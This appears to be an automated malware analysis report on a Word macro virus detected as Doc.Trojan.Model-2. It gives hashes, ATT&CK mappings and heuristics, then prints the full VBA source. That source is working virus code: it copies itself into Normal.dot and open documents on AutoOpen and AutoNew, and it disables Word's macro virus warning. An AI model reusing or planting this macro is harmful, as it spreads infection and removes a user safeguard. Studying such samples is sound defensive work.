Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f2767dd0a7e4e0c4…

MALICIOUS

Office (OLE)

29.5 KB Created: 1999-09-16 03:08:00 Authoring application: Microsoft Word 8.0 First seen: 2019-01-25
MD5: 61bfa2e369d39411a0d08a7107b03d6b SHA-1: 99eca4aba9d1bad14c74d66019056a427873059d SHA-256: f2767dd0a7e4e0c46ccb03c987a0e8748be65cb976151a23288d08deefb86fa0
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV and contains a critical AutoOpen VBA macro. This macro is designed to copy its malicious code to the Normal.dot template and any currently open documents, effectively spreading itself. The presence of the AutoOpen macro and the OLE_LEGACY_WORDBASIC_AUTOEXEC firing indicate a self-propagating malicious document.

Heuristics 4

  • ClamAV: Doc.Trojan.Model-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Model-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1441 bytes
SHA-256: a70e77c39aa544f6bdc70147c96b585f353ffd32639c67c7a86befa4067edfc3
Detection
ClamAV: Doc.Trojan.Model-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Code"
Sub AutoNew()
    If Not ActiveDocument = ThisDocument Then
        CopyVirCodeToDocument ActiveDocument    'Infetta il nuovo documento
    End If
End Sub
Sub AutoOpen()
    RemoveProtection
    If Not ActiveDocument = NormalTemplate Then 'Infetta Normal.dot
        CopyVirCodeToModel
    End If
    If Not ActiveDocument = ThisDocument Then   'Infetta il documento aperto
        CopyVirCodeToDocument ActiveDocument
    End If
End Sub
Sub CopyVirCodeToModel()
On Local Error Resume Next
    With ActiveDocument
        .UpdateStylesOnOpen = False
        .AttachedTemplate = "Normal.dot"
    End With
    Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Code", Object:=wdOrganizerObjectProjectItems
    NormalTemplate.Save
End Sub
Sub CopyVirCodeToDocument(Target As Document)
    On Local Error Resume Next
    Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=Target.FullName, Name:="Code", Object:=wdOrganizerObjectProjectItems
End Sub
Sub RemoveProtection()
    'Disattiva il messaggio di avviso iniziale
    Options.VirusProtection = False
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.